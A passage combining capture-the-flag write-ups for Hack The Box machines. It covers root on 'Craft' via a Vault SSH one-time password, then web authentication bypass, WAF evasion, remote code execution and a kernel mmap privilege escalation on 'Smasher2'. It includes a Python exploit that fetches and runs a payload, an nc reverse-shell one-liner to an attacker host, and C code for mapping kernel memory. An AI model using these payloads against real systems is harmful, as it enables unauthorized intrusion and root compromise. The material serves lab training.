gilfoyle@craft:~$ ls -la
total 44
drwx------ 5 gilfoyle gilfoyle 4096 Jan  3 13:42 .
drwxr-xr-x 3 root     root     4096 Feb  9  2019 ..
-rw-r--r-- 1 gilfoyle gilfoyle  634 Feb  9  2019 .bashrc
drwx------ 3 gilfoyle gilfoyle 4096 Feb  9  2019 .config
drwx------ 2 gilfoyle gilfoyle 4096 Jan  3 13:31 .gnupg
-rw-r--r-- 1 gilfoyle gilfoyle  148 Feb  8  2019 .profile
drwx------ 2 gilfoyle gilfoyle 4096 Feb  9  2019 .ssh
-r-------- 1 gilfoyle gilfoyle   33 Feb  9  2019 user.txt
-rw------- 1 gilfoyle gilfoyle   36 Feb  9  2019 .vault-token
-rw------- 1 gilfoyle gilfoyle 5091 Jan  3 13:28 .viminfo
gilfoyle@craft:~$ cat .vault-token 
f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9gilfoyle@craft:~$

A quick search revealed that it’s related to vault.

Secure, store and tightly control access to tokens, passwords, certificates, encryption keys for protecting secrets and other sensitive data using a UI, CLI, or HTTP API. -vaultproject.io

By looking at vault.sh from craft-infra repository (vault/vault.sh), we’ll see that it enables the ssh secrets engine then creates an otp role for root:

#!/bin/bash

# set up vault secrets backend

vault secrets enable ssh

vault write ssh/roles/root_otp \
    key_type=otp \
    default_user=root \
    cidr_list=0.0.0.0/0

We have the token (.vault-token) so we can easily authenticate to the vault and create an otp for a root ssh session:

gilfoyle@craft:~$ vault login
Token (will be hidden): 
Success! You are now authenticated. The token information displayed below
is already stored in the token helper. You do NOT need to run "vault login"
again. Future Vault requests will automatically use this token.

Key                  Value
---                  -----
token                f1783c8d-41c7-0b12-d1c1-cf2aa17ac6b9
token_accessor       1dd7b9a1-f0f1-f230-dc76-46970deb5103
token_duration       ∞
token_renewable      false
token_policies       ["root"]
identity_policies    []
policies             ["root"]
gilfoyle@craft:~$ vault write ssh/creds/root_otp ip=127.0.0.1
Key                Value
---                -----
lease_id           ssh/creds/root_otp/f17d03b6-552a-a90a-02b8-0932aaa20198
lease_duration     768h
lease_renewable    false
ip                 127.0.0.1
key                c495f06b-daac-8a95-b7aa-c55618b037ee
key_type           otp
port               22
username           root
gilfoyle@craft:~$

And finally we’ll ssh into localhost and use the generated password (c495f06b-daac-8a95-b7aa-c55618b037ee):

gilfoyle@craft:~$ ssh [email protected]


  .   *   ..  . *  *
*  * @()Ooc()*   o  .
    (Q@*0CG*O()  ___
   |\_________/|/ _ \
   |  |  |  |  | / | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | | | |
   |  |  |  |  | \_| |
   |  |  |  |  |\___/
   |\_|__|__|_/|
    \_________/



Password: 
Linux craft.htb 4.9.0-8-amd64 #1 SMP Debian 4.9.130-2 (2018-10-27) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Tue Aug 27 04:53:14 2019
root@craft:~# 




And we owned root !
That’s it , Feedback is appreciated !
Don’t forget to read the previous write-ups , Tweet about the write-up if you liked it , follow on twitter @Ahm3d_H3sham
Thanks for reading.

Previous Hack The Box write-up : Hack The Box - Smasher2
Next Hack The Box write-up : Hack The Box - Bitlab

Hack The Box - Smasher2

By: 0xRick
14 December 2019 at 05:00

Hack The Box - Smasher2

Quick Summary

Hey guys, today smasher2 retired and here’s my write-up about it. Smasher2 was an interesting box and one of the hardest I have ever solved. Starting with a web application vulnerable to authentication bypass and RCE combined with a WAF bypass, then a kernel module with an insecure mmap handler implementation allowing users to access kernel memory. I enjoyed the box and learned a lot from it. It’s a Linux box and its ip is 10.10.10.135, I added it to /etc/hosts as smasher2.htb. Let’s jump right in!




Nmap

As always we will start with nmap to scan for open ports and services:

root@kali:~/Desktop/HTB/boxes/smasher2# nmap -sV -sT -sC -o nmapinitial smasher2.htb 
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-13 07:32 EST
Nmap scan report for smasher2.htb (10.10.10.135)
Host is up (0.18s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 23:a3:55:a8:c6:cc:74:cc:4d:c7:2c:f8:fc:20:4e:5a (RSA)
|   256 16:21:ba:ce:8c:85:62:04:2e:8c:79:fa:0e:ea:9d:33 (ECDSA)
|_  256 00:97:93:b8:59:b5:0f:79:52:e1:8a:f1:4f:ba:ac:b4 (ED25519)
53/tcp open  domain  ISC BIND 9.11.3-1ubuntu1.3 (Ubuntu Linux)
| dns-nsid: 
|_  bind.version: 9.11.3-1ubuntu1.3-Ubuntu
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.74 seconds
root@kali:~/Desktop/HTB/boxes/smasher2# 

We got ssh on port 22, dns on port 53 and http on port 80.

DNS

First thing I did was to enumerate vhosts through the dns server and I got 1 result:

root@kali:~/Desktop/HTB/boxes/smasher2# dig axfr smasher2.htb @10.10.10.135

; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> axfr smasher2.htb @10.10.10.135
;; global options: +cmd
smasher2.htb.           604800  IN      SOA     smasher2.htb. root.smasher2.htb. 41 604800 86400 2419200 604800
smasher2.htb.           604800  IN      NS      smasher2.htb.
smasher2.htb.           604800  IN      A       127.0.0.1
smasher2.htb.           604800  IN      AAAA    ::1
smasher2.htb.           604800  IN      PTR     wonderfulsessionmanager.smasher2.htb.
smasher2.htb.           604800  IN      SOA     smasher2.htb. root.smasher2.htb. 41 604800 86400 2419200 604800
;; Query time: 299 msec
;; SERVER: 10.10.10.135#53(10.10.10.135)
;; WHEN: Fri Dec 13 07:36:43 EST 2019
;; XFR size: 6 records (messages 1, bytes 242)

root@kali:~/Desktop/HTB/boxes/smasher2# 

wonderfulsessionmanager.smasher2.htb, I added it to my hosts file.

Web Enumeration

http://smasher2.htb had the default Apache index page:


http://wonderfulsessionmanager.smasher2.htb:


The only interesting here was the login page:


I kept testing it for a while and the responses were like this one:



It didn’t request any new pages so I suspected that it’s doing an AJAX request, I intercepted the login request to find out the endpoint it was requesting:

POST /auth HTTP/1.1
Host: wonderfulsessionmanager.smasher2.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://wonderfulsessionmanager.smasher2.htb/login
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 80
Connection: close
Cookie: session=eyJpZCI6eyIgYiI6Ik16UXpNakpoTVRVeVlqaGlNekJsWVdSbU9HTXlPV1kzTmprMk1XSTROV00xWkdVME5HTmxNQT09In19.XfNxUQ.MznJKgs2isklCZxfV4G0IjEPcvg

{"action":"auth","data":{"username":"test","password":"test"}}

While browsing http://wonderfulsessionmanager.smasher2.htb I had gobuster running in the background on http://smasher2.htb/:

root@kali:~/Desktop/HTB/boxes/smasher2# gobuster dir -u http://smasher2.htb/ -w /usr/share/wordlists/dirb/common.txt 
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://smasher2.htb/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2019/12/13 07:37:54 Starting gobuster
===============================================================
/.git/HEAD (Status: 403)
/.hta (Status: 403)
/.bash_history (Status: 403)
/.config (Status: 403)
/.bashrc (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.profile (Status: 403)
/.mysql_history (Status: 403)
/.sh_history (Status: 403)
/.svn/entries (Status: 403)
/_vti_bin/_vti_adm/admin.dll (Status: 403)
/_vti_bin/shtml.dll (Status: 403)
/_vti_bin/_vti_aut/author.dll (Status: 403)
/akeeba.backend.log (Status: 403)
/awstats.conf (Status: 403)
/backup (Status: 301)
/development.log (Status: 403)
/global.asa (Status: 403)
/global.asax (Status: 403)
/index.html (Status: 200)
/main.mdb (Status: 403)
/php.ini (Status: 403)
/production.log (Status: 403)
/readfile (Status: 403)
/server-status (Status: 403)
/spamlog.log (Status: 403)
/Thumbs.db (Status: 403)
/thumbs.db (Status: 403)
/web.config (Status: 403)
/WS_FTP.LOG (Status: 403)
===============================================================
2019/12/13 07:39:17 Finished
===============================================================
root@kali:~/Desktop/HTB/boxes/smasher2# 

The only result that wasn’t 403 was /backup so I checked that and found 2 files:


Note: Months ago when I solved this box for the first time /backup was protected by basic http authentication, that wasn’t the case when I revisited the box for the write-up even after resetting it. I guess it got removed, however it wasn’t an important step, it was just heavy brute force so the box is better without it.
I downloaded the files to my box:

root@kali:~/Desktop/HTB/boxes/smasher2# mkdir backup
root@kali:~/Desktop/HTB/boxes/smasher2# cd backup/
root@kali:~/Desktop/HTB/boxes/smasher2/backup# wget http://smasher2.htb/backup/auth.py
--2019-12-13 07:40:19--  http://smasher2.htb/backup/auth.py
Resolving smasher2.htb (smasher2.htb)... 10.10.10.135
Connecting to smasher2.htb (smasher2.htb)|10.10.10.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4430 (4.3K) [text/x-python]
Saving to: ‘auth.py’

auth.py                                                    100%[=======================================================================================================================================>]   4.33K  --.-KB/s    in 0.07s   

2019-12-13 07:40:20 (64.2 KB/s) - ‘auth.py’ saved [4430/4430]

root@kali:~/Desktop/HTB/boxes/smasher2/backup# wget http://smasher2.htb/backup/ses.so 
--2019-12-13 07:40:43--  http://smasher2.htb/backup/ses.so
Resolving smasher2.htb (smasher2.htb)... 10.10.10.135
Connecting to smasher2.htb (smasher2.htb)|10.10.10.135|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 18608 (18K)
Saving to: ‘ses.so’

ses.so                                                     100%[=======================================================================================================================================>]  18.17K  85.2KB/s    in 0.2s    

2019-12-13 07:40:44 (85.2 KB/s) - ‘ses.so’ saved [18608/18608]

root@kali:~/Desktop/HTB/boxes/smasher2/backup# 

By looking at auth.py I knew that these files were related to wonderfulsessionmanager.smasher2.htb.

auth.py: Analysis

auth.py:

#!/usr/bin/env python
import ses
from flask import session,redirect, url_for, request,render_template, jsonify,Flask, send_from_directory
from threading import Lock
import hashlib
import hmac
import os
import base64
import subprocess
import time

def get_secure_key():
    m = hashlib.sha1()
    m.update(os.urandom(32))
    return m.hexdigest()

def craft_secure_token(content):
    h = hmac.new("HMACSecureKey123!", base64.b64encode(content).encode(), hashlib.sha256)
    return h.hexdigest()


lock = Lock()
app = Flask(__name__)
app.config['SECRET_KEY'] = get_secure_key()
Managers = {}

def log_creds(ip, c):
    with open("creds.log", "a") as creds:
        creds.write("Login from {} with data {}:{}\n".format(ip, c["username"], c["password"]))
        creds.close()

def safe_get_manager(id):
    lock.acquire()
    manager = Managers[id]
    lock.release()
    return manager

def safe_init_manager(id):
    lock.acquire()
    if id in Managers:
        del Managers[id]
    else:
            login = ["<REDACTED>", "<REDACTED>"]
            Managers.update({id: ses.SessionManager(login, craft_secure_token(":".join(login)))})
    lock.release()

def safe_have_manager(id):
    ret = False
    lock.acquire()
    ret = id in Managers
    lock.release()
    return ret

@app.before_request
def before_request():
    if request.path == "/":
        if not session.has_key("id"):
            k = get_secure_key()
            safe_init_manager(k)
            session["id"] = k
        elif session.has_key("id") and not safe_have_manager(session["id"]):
            del session["id"]
            return redirect("/", 302)
    else:
        if session.has_key("id") and safe_have_manager(session["id"]):
            pass
        else:
            return redirect("/", 302)

@app.after_request
def after_request(resp):
    return resp


@app.route('/assets/<path:filename>')
def base_static(filename):
    return send_from_directory(app.root_path + '/assets/', filename)


@app.route('/', methods=['GET'])
def index():
    return render_template("index.html")


@app.route('/login', methods=['GET'])
def view_login():
    return render_template("login.html")

@app.route('/auth', methods=['POST'])
def login():
    ret = {"authenticated": None, "result": None}
    manager = safe_get_manager(session["id"])
    data = request.get_json(silent=True)
    if data:
        try:
            tmp_login = dict(data["data"])
        except:
            pass
        tmp_user_login = None
        try:
            is_logged = manager.check_login(data)
            secret_token_info = ["/api/<api_key>/job", manager.secret_key, int(time.time())]
            try:
                tmp_user_login = {"username": tmp_login["username"], "password": tmp_login["password"]}
            except:
                pass
            if not is_logged[0]:
                ret["authenticated"] = False
                ret["result"] = "Cannot authenticate with data: %s - %s" % (is_logged[1], "Too many tentatives, wait 2 minutes!" if manager.blocked else "Try again!")
            else:
                if tmp_user_login is not None:
                    log_creds(request.remote_addr, tmp_user_login)
                ret["authenticated"] = True
                ret["result"] = {"endpoint": secret_token_info[0], "key": secret_token_info[1], "creation_date": secret_token_info[2]}
        except TypeError as e:
            ret["authenticated"] = False
            ret["result"] = str(e)
    else:
        ret["authenticated"] = False
        ret["result"] = "Cannot authenticate missing parameters."
    return jsonify(ret)


@app.route("/api/<key>/job", methods=['POST'])
def job(key):
    ret = {"success": None, "result": None}
    manager = safe_get_manager(session["id"])
    if manager.secret_key == key:
        data = request.get_json(silent=True)
        if data and type(data) == dict:
            if "schedule" in data:
                out = subprocess.check_output(['bash', '-c', data["schedule"]])
                ret["success"] = True
                ret["result"] = out
            else:
                ret["success"] = False
                ret["result"] = "Missing schedule parameter."
        else:
            ret["success"] = False
            ret["result"] = "Invalid value provided."
    else:
        ret["success"] = False
        ret["result"] = "Invalid token."
    return jsonify(ret)


app.run(host='127.0.0.1', port=5000)

I read the code and these are the things that interest us:
After successful authentication the server will respond with a secret key that we can use to access the endpoint /api/<key>/job:

                ret["authenticated"] = True
                ret["result"] = {"endpoint": secret_token_info[0], "key": secret_token_info[1], "creation_date": secret_token_info[2]}
            secret_token_info = ["/api/<api_key>/job", manager.secret_key, int(time.time())]

That endpoint only accepts POST requests:

@app.route("/api/<key>/job", methods=['POST'])

And the sent data has to be json:

        data = request.get_json(silent=True)
        if data and type(data) == dict:
            ...

Through that endpoint we can execute system commands by providing them in a parameter called schedule:

            if "schedule" in data:
                out = subprocess.check_output(['bash', '-c', data["schedule"]])
                ret["success"] = True
                ret["result"] = out

session.so: Analysis –> Authentication Bypass

session.so is a compiled shared python library, so stands for shared object:

root@kali:~/Desktop/HTB/boxes/smasher2/backup# file ses.so 
ses.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=0c67d40b77854318b10417b4aedfee95a52f0550, not stripped
root@kali:~/Desktop/HTB/boxes/smasher2/backup#

I opened it in ghidra and started checking the functions. Two functions caught my attention, get_internal_pwd() and get_internal_usr():


I looked at the decompiled code of both of them and noticed something strange, they were the exact same: get_internal_pwd():

undefined8 get_internal_pwd(undefined8 param_1)

{
  long *plVar1;
  undefined8 uVar2;
  
  plVar1 = (long *)PyObject_GetAttrString(param_1,"user_login");
  uVar2 = PyList_GetItem(plVar1,0);
  uVar2 = PyString_AsString(uVar2);
  *plVar1 = *plVar1 + -1;
  if (*plVar1 == 0) {
    (**(code **)(plVar1[1] + 0x30))(plVar1);
  }
  return uVar2;
}

get_internal_usr():

undefined8 get_internal_usr(undefined8 param_1)

{
  long *plVar1;
  undefined8 uVar2;
  
  plVar1 = (long *)PyObject_GetAttrString(param_1,"user_login");
  uVar2 = PyList_GetItem(plVar1,0);
  uVar2 = PyString_AsString(uVar2);
  *plVar1 = *plVar1 + -1;
  if (*plVar1 == 0) {
    (**(code **)(plVar1[1] + 0x30))(plVar1);
  }
  return uVar2;
}
root@kali:~/Desktop/HTB/boxes/smasher2/backup# diff getinternalusr getinternalpwd 
1c1
< undefined8 get_internal_usr(undefined8 param_1)
---
> undefined8 get_internal_pwd(undefined8 param_1)
root@kali:~/Desktop/HTB/boxes/smasher2/backup#

So in theory, since the two function are identical, providing the username as a password should work. Which means that it’s just a matter of finding an existing username and we’ll be able to bypass the authentication.
I tried some common usernames before attempting to use wfuzz, Administrator worked:



WAF Bypass –> RCE –> Shell as dzonerzy –> User Flag

I wrote a small script to execute commands through /api/<key>/job as we saw earlier in auth.py, the script was meant for testing purposes:

#!/usr/bin/python3
from requests import post

cookies = {"session":"eyJpZCI6eyIgYiI6Ik16UXpNakpoTVRVeVlqaGlNekJsWVdSbU9HTXlPV1kzTmprMk1XSTROV00xWkdVME5HTmxNQT09In19.XfNxUQ.MznJKgs2isklCZxfV4G0IjEPcvg"}

while True:
	cmd = input("cmd: ")
	req = post("http://wonderfulsessionmanager.smasher2.htb/api/fe61e023b3c64d75b3965a5dd1a923e392c8baeac4ef870334fcad98e6b264f8/job", json={"schedule":cmd}, cookies=cookies)
	response = req.text
	print(response)

Testing with whoami worked just fine:

root@kali:~/Desktop/HTB/boxes/smasher2# ./test.py 
cmd: whoami
{"result":"dzonerzy\n","success":true}

cmd:

However when I tried other commands I got a 403 response indicating that the server was protected by a WAF:

cmd: curl http://10.10.xx.xx
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /api/fe61e023b3c64d75b3965a5dd1a923e392c8baeac4ef870334fcad98e6b264f8/job
on this server.<br />
</p>

<address>Apache/2.4.29 (Ubuntu) Server at wonderfulsessionmanager.smasher2.htb Port 80</address>
</body></html>

cmd:

I could easily bypass it by inserting single quotes in the command:

cmd: 'w'g'e't 'h't't'p':'/'/'1'0'.'1'0'.'x'x'.'x'x'/'t'e's't'
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request.  Either the server is overloaded or there is an error in the application.</p>

cmd:
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.135 - - [13/Dec/2019 08:18:33] code 404, message File not found
10.10.10.135 - - [13/Dec/2019 08:18:33] "GET /test HTTP/1.1" 404 -

To automate the exploitation process I wrote this small exploit:

#!/usr/bin/python3 
import requests

YELLOW = "\033[93m"
GREEN = "\033[32m"

def getKey(session):
	req = session.post("http://wonderfulsessionmanager.smasher2.htb/auth", json={"action":"auth","data":{"username":"Administrator","password":"Administrator"}})
	response = req.json()
	key = response['result']['key']
	return key

def exploit(session, key):
	download_payload = "\'w\'g\'e\'t \'h\'t\'t\'p\':\'/\'/\'1\'0\'.\'1\'0\'.\'x\'x\'.\'x\'x\'/\'s\'h\'e\'l\'l\'.\'s\'h\'"
	print(YELLOW + "[+] Downloading payload")
	download_req = session.post("http://wonderfulsessionmanager.smasher2.htb/api/{}/job".format(key), json={"schedule":download_payload})
	print(GREEN + "[*] Done")
	exec_payload = "s\'h\' \'s\'h\'e\'l\'l\'.\'s\'h"
	print(YELLOW + "[+] Executing payload")
	exec_req = session.post("http://wonderfulsessionmanager.smasher2.htb/api/{}/job".format(key), json={"schedule":exec_payload})
	print(GREEN + "[*] Done. Exiting ...")
	exit()

session = requests.Session()
session.get("http://wonderfulsessionmanager.smasher2.htb/login")
print(YELLOW +"[+] Authenticating")
key = getKey(session)
print(GREEN + "[*] Session: " + session.cookies.get_dict()['session'])
print(GREEN + "[*] key: " + key)
exploit(session, key)

The exploit sends 2 commands, the first one is a wget command that downloads shell.sh and the other one executes it.
shell.sh:

#!/bin/bash
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.xx.xx 1337 >/tmp/f

I hosted it on a python server and I started a netcat listener on port 1337 then I ran the exploit:


We owned user.

dhid.ko: Enumeration

After getting a shell I copied my public ssh key to /home/dzonerzy/.ssh/authorized_keys and got ssh access.
In the home directory of dzonerzy there was a README containing a message from him saying that we’ll need to think outside the box to root smasher2:

dzonerzy@smasher2:~$ ls -al
total 44
drwxr-xr-x 6 dzonerzy dzonerzy 4096 Feb 17  2019 .
drwxr-xr-x 3 root     root     4096 Feb 15  2019 ..
lrwxrwxrwx 1 dzonerzy dzonerzy    9 Feb 15  2019 .bash_history -> /dev/null
-rw-r--r-- 1 dzonerzy dzonerzy  220 Feb 15  2019 .bash_logout
-rw-r--r-- 1 dzonerzy dzonerzy 3799 Feb 16  2019 .bashrc
drwx------ 3 dzonerzy dzonerzy 4096 Feb 15  2019 .cache
drwx------ 3 dzonerzy dzonerzy 4096 Feb 15  2019 .gnupg
drwx------ 5 dzonerzy dzonerzy 4096 Feb 17  2019 .local
-rw-r--r-- 1 dzonerzy dzonerzy  807 Feb 15  2019 .profile
-rw-r--r-- 1 root     root      900 Feb 16  2019 README
drwxrwxr-x 4 dzonerzy dzonerzy 4096 Dec 13 12:50 smanager
-rw-r----- 1 root     dzonerzy   33 Feb 17  2019 user.txt
dzonerzy@smasher2:~$ cat README 


         .|'''.|                            '||                      
         ||..  '  .. .. ..    ....    ....   || ..     ....  ... ..  
          ''|||.   || || ||  '' .||  ||. '   ||' ||  .|...||  ||' '' 
        .     '||  || || ||  .|' ||  . '|..  ||  ||  ||       ||     
        |'....|'  .|| || ||. '|..'|' |'..|' .||. ||.  '|...' .||.    v2.0 
                                                             
                                                        by DZONERZY 

Ye you've come this far and I hope you've learned something new, smasher wasn't created
with the intent to be a simple puzzle game... but instead I just wanted to pass my limited
knowledge to you fellow hacker, I know it's not much but this time you'll need more than
skill, you will need to think outside the box to complete smasher 2 , have fun and happy

                                       Hacking!

free(knowledge);
free(knowledge);
* error for object 0xd00000000b400: pointer being freed was not allocated *


dzonerzy@smasher2:~$ 

After some enumeration, I checked the auth log and saw this line:

dzonerzy@smasher2:~$ cat /var/log/auth.log
----------
 Redacted
----------
Dec 13 11:49:34 smasher2 sudo:     root : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/sbin/insmod /lib/modules/4.15.0-45-generic/kernel/drivers/hid/dhid.ko
----------
 Redacted
----------
dzonerzy@smasher2:~$

insmod (stands for insert module) is a tool used to load kernel modules. dhid.ko is a kernel module (ko stands for kernel object)

dzonerzy@smasher2:~$ cd /lib/modules/4.15.0-45-generic/kernel/drivers/hid/
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ file dhid.ko 
dhid.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=d4315261f7c9c38393394f6779378abcff6270d2, not stripped
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$

I checked the loaded kernel modules and that module was still loaded:

dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ lsmod | grep dhid
dhid                   16384  0
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$

We can use modinfo to list the information about that module, as you can see it was written by dzonerzy:

dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ modinfo dhid
filename:       /lib/modules/4.15.0-45-generic/kernel/drivers/hid/dhid.ko
version:        1.0
description:    LKM for dzonerzy dhid devices
author:         DZONERZY
license:        GPL
srcversion:     974D0512693168483CADFE9
depends:        
retpoline:      Y
name:           dhid
vermagic:       4.15.0-45-generic SMP mod_unload 
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ 

Last thing I wanted to check was if there was device driver file for the module:

dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ ls -la /dev/ | grep dhid
crwxrwxrwx  1 root root    243,   0 Dec 13 11:49 dhid
dzonerzy@smasher2:/lib/modules/4.15.0-45-generic/kernel/drivers/hid$ 

I downloaded the module on my box to start analyzing it:

root@kali:~/Desktop/HTB/boxes/smasher2# scp -i id_rsa [email protected]:/lib/modules/4.15.0-45-generic/kernel/drivers/hid/dhid.ko ./ 
dhid.ko                                                                                                                                                                                                  100% 8872    16.1KB/s   00:00    
root@kali:~/Desktop/HTB/boxes/smasher2# file dhid.ko 
dhid.ko: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), BuildID[sha1]=d4315261f7c9c38393394f6779378abcff6270d2, not stripped
root@kali:~/Desktop/HTB/boxes/smasher2#

dhid.ko: Analysis

I opened the module in ghidra then I started checking the functions:


The function dev_read() had a hint that this is the intended way to root the box:

long dev_read(undefined8 param_1,undefined8 param_2)

{
  int iVar1;
  
  __fentry__();
  iVar1 = _copy_to_user(param_2,"This is the right way, please exploit this shit!",0x30);
  return (ulong)(-(uint)(iVar1 == 0) & 0xf) - 0xe;
}

One interesting function that caught my attention was dev_mmap():

ulong dev_mmap(undefined8 param_1,long *param_2)

{
  uint uVar1;
  ulong uVar2;
  uint uVar3;
  
  __fentry__();
  uVar3 = (int)param_2[1] - *(int *)param_2;
  uVar1 = (uint)(param_2[0x13] << 0xc);
  printk(&DAT_00100380,(ulong)uVar3,param_2[0x13] << 0xc & 0xffffffff);
  if ((((int)uVar3 < 0x10001) && (uVar1 < 0x1001)) && ((int)(uVar3 + uVar1) < 0x10001)) {
    uVar1 = remap_pfn_range(param_2,*param_2,(long)(int)uVar1,param_2[1] - *param_2,param_2[9]);
    uVar2 = (ulong)uVar1;
    if (uVar1 == 0) {
      printk(&DAT_0010057b);
    }
    else {
      uVar2 = 0xfffffff5;
      printk(&DAT_00100567);
    }
  }
  else {
    uVar2 = 0xfffffff5;
    printk(&DAT_001003b0);
  }
  return uVar2;
}

In case you don’t know what mmap is, simply mmap is a system call which is used to map memory to a file or a device. (Check this)
The function dev_mmap() is a custom mmap handler.
The interesting part here is the call to remap_pfn_range() function (remap kernel memory to userspace):

remap_pfn_range(param_2,*param_2,(long)(int)uVar1,param_2[1] - *param_2,param_2[9]);

I checked the documentation of remap_pfn_range() to know more about it, the function takes 5 arguments:

int remap_pfn_range (	struct vm_area_struct * vma,
 	unsigned long addr,
 	unsigned long pfn,
 	unsigned long size,
 	pgprot_t prot);

Description of each argument:

struct vm_area_struct * vma
    user vma to map to

unsigned long addr
    target user address to start at

unsigned long pfn
    physical address of kernel memory

unsigned long size
    size of map area

pgprot_t prot
    page protection flags for this mapping

If we look at the function call again we can see that the 3rd and 4th arguments (physical address of the kernel memory and size of map area) are given to the function without any prior validation:

ulong dev_mmap(undefined8 param_1,long *param_2)

{
  uint uVar1;
  ulong uVar2;
  uint uVar3;
  
  __fentry__();
  uVar3 = (int)param_2[1] - *(int *)param_2;
  uVar1 = (uint)(param_2[0x13] << 0xc);
  printk(&DAT_00100380,(ulong)uVar3,param_2[0x13] << 0xc & 0xffffffff);
  if ((((int)uVar3 < 0x10001) && (uVar1 < 0x1001)) && ((int)(uVar3 + uVar1) < 0x10001)) {
    uVar1 = remap_pfn_range(param_2,*param_2,(long)(int)uVar1,param_2[1] - *param_2,param_2[9]);
    ...

This means that we can map any size of memory we want and read/write to it, allowing us to even access the kernel memory.

dhid.ko: Exploitation –> Root Shell –> Root Flag

Luckily, this white paper had a similar scenario and explained the exploitation process very well, I recommend reading it after finishing the write-up, I will try to explain the process as good as I can but the paper will be more detailed. In summary, what’s going to happen is that we’ll map a huge amount of memory and search through it for our process’s cred structure (The cred structure holds our process credentials) then overwrite our uid and gid with 0 and execute /bin/sh. Let’s go through it step by step.
First, we need to make sure that it’s really exploitable, we’ll try to map a huge amount of memory and check if it worked:

#include <stdio.h>
#include <stdlib.h>                                                        
#include <sys/types.h>                                                       
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>

int main(int argc, char * const * argv){
	
	printf("[+] PID: %d\n", getpid());
	int fd = open("/dev/dhid", O_RDWR);
	
	if (fd < 0){
		printf("[!] Open failed!\n");
		return -1;
	}
	
	printf("[*] Open OK fd: %d\n", fd);

	unsigned long size = 0xf0000000;
	unsigned long mmapStart = 0x42424000;
	unsigned int * addr = (unsigned int *)mmap((void*)mmapStart, size, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0x0);

	if (addr == MAP_FAILED){
		perror("[!] Failed to mmap");
		close(fd);
		return -1;
	}

	printf("[*] mmap OK address: %lx\n", addr);
	
	int stop = getchar();
	return 0;
}

I compiled the code and uploaded it to the box:

root@kali:~/Desktop/HTB/boxes/smasher2# gcc -o pwn pwn.c 
root@kali:~/Desktop/HTB/boxes/smasher2# scp -i id_rsa ./pwn [email protected]:/dev/shm/pwn
pwn                                                                                100%   17KB  28.5KB/s   00:00    
root@kali:~/Desktop/HTB/boxes/smasher2# 

Then I ran it:

dzonerzy@smasher2:/dev/shm$ ./pwn 
[+] PID: 8186
[*] Open OK fd: 3
[*] mmap OK address: 42424000

From another ssh session I checked the process memory mapping, the attempt was successful:

dzonerzy@smasher2:/dev/shm$ cat /proc/8186/maps 
42424000-132424000 rw-s 00000000 00:06 440                               /dev/dhid
----------
 Redacted
----------
dzonerzy@smasher2:/dev/shm$

Now we can start searching for the cred structure that belongs to our process, if we take a look at the how the cred structure looks like:

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
